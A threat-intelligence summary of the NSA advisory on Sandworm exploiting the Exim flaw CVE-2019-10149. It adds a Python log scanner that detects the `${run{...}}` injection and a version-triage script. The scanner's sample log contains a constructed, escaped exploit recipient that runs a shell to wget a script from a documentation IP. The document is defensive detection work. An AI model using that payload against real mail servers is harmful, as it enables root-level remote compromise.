Full Report
On May 28, 2020, the NSA released a cybersecurity advisory on Russian APT group Sandworm exploiting CVE-2019-10149, a vulnerability in Exim Mail Transfer Agent (MTA) software. An unauthenticated remote attacker can use this vulnerability to send a specially crafted email to ex...
Analysis Summary
# Threat Actor: Sandworm
## Attribution & Identity
* **Identification:** Russian APT group.
* **Known Aliases:** (Not explicitly listed in the provided text, but contextually associated with Russian state-sponsored activity).
* **Associated Groups:** (Not explicitly listed in the provided text).
## Activity Summary
The NSA released an advisory on May 28, 2020, detailing Sandworm actors exploiting CVE-2019-10149 in Exim Mail Transfer Agent (MTA) software. This was a 1-day (already disclosed and patched) vulnerability rather than a zero-day: the fix shipped in Exim 4.92 and the flaw was publicly disclosed in June 2019, close to a year before the advisory.
## Tactics, Techniques & Procedures
* **Exploitation of Vulnerability:** Exploiting CVE-2019-10149 in Exim MTA by sending a specially crafted email to an exposed mail server; no authentication is required (used for Initial Access).
* **Privilege Escalation:** No separate escalation step is needed. The vulnerable Exim code path runs as root, so the commands an unauthenticated remote attacker injects execute with **root privileges** from the outset.
* **Post-Exploitation Actions:** Installing programs, modifying data, and creating new accounts (the standard consequences of root access on the mail server).
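An added detection example (not from the NSA advisory or the Exim project): the scanner below reads Exim mainlog arrival lines and flags recipient local parts that contain an Exim string expansion, the `${run{...}}` construct described in the public disclosure of CVE-2019-10149, and decodes the `\xNN` escapes attackers used to obscure the shell command from a naive grep. The log lines, message IDs, addresses and URL are constructed for the example; the note that recipients only appear on arrival lines with the `+received_recipients` log_selector is an Exim configuration fact, not something this page states.

```python
"""Detect CVE-2019-10149 exploitation attempts in Exim mainlog records.

Added example, not part of the NSA advisory or the Exim project. The log
lines below are constructed; the IP addresses and URL use documentation
ranges, not real infrastructure.
"""
import re
from typing import List, Optional

# Constructed Exim mainlog message-arrival ("<=") lines. Recipients appear on
# these lines only when log_selector includes +received_recipients; without
# it, look at the rejectlog or a capture of the SMTP RCPT TO commands.
SAMPLE_MAINLOG = """\
2019-09-05 10:21:07 1i5qZr-0001Ab-2X <= alice@example.org H=mail.example.org [198.51.100.7] P=esmtps S=2210 for bob@example.com
2019-09-05 10:22:44 1i5qbG-0001Ac-5Q <= attacker@example.net H=(x) [203.0.113.5] P=esmtp S=412 for ${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x20http\\x3A\\x2F\\x2F203.0.113.9\\x2Fx.sh\\x22}}@localhost
2019-09-05 10:23:01 1i5qbX-0001Ad-7K <= carol@example.org H=mta.example.org [198.51.100.8] P=esmtps S=1890 for dave@example.com
"""

ARRIVAL_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<msgid>\S+) <= (?P<sender>\S+) .*? for (?P<rcpts>.+)$"
)
SOURCE_IP_RE = re.compile(r"\[(?P<ip>[^\]]+)\]")
RUN_RE = re.compile(r"\$\{run\{(?P<cmd>.*?)\}\}", re.DOTALL)
# Backslash escapes accepted by Exim's string expander: \xNN, \t, \n, \r, \\
ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[tnr\\])")


def decode_exim_escapes(s: str) -> str:
    """Undo the escapes used to hide the command (e.g. \\x2Fbin\\x2Fsh -> /bin/sh)."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        return {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}[tok]
    return ESCAPE_RE.sub(repl, s)


def scan_mainlog(text: str) -> List[dict]:
    """One finding per arrival line whose recipient local part carries an Exim
    expansion. A legitimate local part never contains '${'; '${run{' is the
    command-execution pattern of CVE-2019-10149."""
    findings: List[dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ARRIVAL_RE.match(line)
        if not m:
            continue
        ip = SOURCE_IP_RE.search(line)
        for rcpt in m.group("rcpts").split():
            local_part = rcpt.rsplit("@", 1)[0]
            if "${" not in local_part:
                continue
            run = RUN_RE.search(local_part)
            command: Optional[str] = decode_exim_escapes(run.group("cmd")) if run else None
            findings.append({
                "line": lineno,
                "message_id": m.group("msgid"),
                "sender": m.group("sender"),
                "source_ip": ip.group("ip") if ip else None,
                "recipient": rcpt,
                "command": command,  # None when the expansion is not ${run{...}}
            })
    return findings


if __name__ == "__main__":
    for f in scan_mainlog(SAMPLE_MAINLOG):
        print(f"line {f['line']}: {f['message_id']} from {f['source_ip']} "
              f"rcpt={f['recipient']}\n  decoded command: {f['command']!r}")
```

Flagging any `${` in a local part, rather than only `${run{`, is deliberate: other expansion items in a recipient address are equally abnormal and a narrower match is easy to evade.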
## Targeting
* **Sectors:** Organizations utilizing Exim Mail Transfer Agent (MTA) software.
* **Geography:** (Not specified in the provided text).
* **Victims:** (No specific organizations named in the provided text, but implied to be users of vulnerable Exim installations).
## Tools & Infrastructure
* **Malware Families Used:** (Not mentioned in the provided text).
* **Infrastructure (C2, domains, IPs):** (Not mentioned in the provided text).
## Implications
Sandworm utilized a known vulnerability (CVE-2019-10149) for initial access, immediately gaining the highest level of system control (root privileges) on vulnerable Linux/Unix mail servers. This allows for complete system compromise.
## Mitigations
* **Patching/Updating:** Upgrade Exim to a fixed release. CVE-2019-10149 affects Exim 4.87 through 4.91; the fix shipped in 4.92. Distributions may backport the fix without changing the upstream version number, so confirm the fixed package version against the vendor's advisory rather than trusting the version string alone.
* **Vulnerability Management:** Address 1-day vulnerabilities promptly: a patch being available does not close the window, and actors like Sandworm weaponize such publicly known flaws for initial access while unpatched systems remain exposed.
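An added triage example for the patching step (not from the NSA advisory or the Exim project): it parses the banner that `exim -bV` prints, classifies the version against the affected range 4.87 to 4.91 with the fix in 4.92, and makes the backport caveat explicit, since a distribution package can carry the fix under an older upstream version string. The sample banners are constructed, and the `distro_backport_confirmed` flag is this example's own parameter, not an Exim option.

```python
"""Triage an Exim installation against CVE-2019-10149 from `exim -bV` output.

Added example, not from the NSA advisory or the Exim project. Upstream:
4.87 through 4.91 are affected, 4.92 carries the fix. Caveat: distributions
backport the fix without changing the upstream version string, so a 4.89 on
a patched distro package is flagged here until confirmed against the distro
advisory.
"""
import re
import shutil
import subprocess
from typing import Optional, Tuple

FIRST_AFFECTED = (4, 87)
FIXED_IN = (4, 92)

# Constructed `exim -bV` output in the format the command prints.
SAMPLE_VULNERABLE = (
    "Exim version 4.91 #1 built 14-Jun-2018 12:21:33\n"
    "Copyright (c) University of Cambridge, 1995 - 2018\n"
)
SAMPLE_FIXED = "Exim version 4.93 #2 built 18-Dec-2019 09:10:01\n"


def parse_exim_version(bv_output: str) -> Optional[Tuple[int, int]]:
    """Pull (major, minor) from the 'Exim version X.YY' banner; None if absent.
    A third component such as 4.92.3 is ignored: every 4.92.x is fixed."""
    m = re.search(r"^Exim version (\d+)\.(\d+)", bv_output, re.MULTILINE)
    return (int(m.group(1)), int(m.group(2))) if m else None


def classify(version: Tuple[int, int], distro_backport_confirmed: bool = False) -> str:
    """Map an upstream version to a triage verdict."""
    if version >= FIXED_IN:
        return "fixed"
    if version < FIRST_AFFECTED:
        return "older than the affected range (not vulnerable by default; upgrade regardless)"
    if distro_backport_confirmed:
        return "fixed (distribution backport)"
    return "VULNERABLE upstream version: upgrade to 4.92+ or confirm a distribution backport"


def triage(bv_output: str, distro_backport_confirmed: bool = False) -> str:
    """Human-readable verdict for one `exim -bV` output."""
    v = parse_exim_version(bv_output)
    if v is None:
        return "unknown: no 'Exim version' banner found"
    return f"{v[0]}.{v[1]}: {classify(v, distro_backport_confirmed)}"


def local_exim_bv() -> Optional[str]:
    """Run the local binary (Debian installs it as exim4); None if not present."""
    exe = shutil.which("exim") or shutil.which("exim4")
    if exe is None:
        return None
    return subprocess.run([exe, "-bV"], capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    print("sample vulnerable ->", triage(SAMPLE_VULNERABLE))
    print("sample fixed      ->", triage(SAMPLE_FIXED))
    local = local_exim_bv()
    print("this host         ->", triage(local) if local else "no exim binary found")
```

Run it on each mail host; a `VULNERABLE` verdict means the package changelog or vendor advisory must be checked before the host is marked clean, because the version string cannot distinguish a backported fix from an unpatched build.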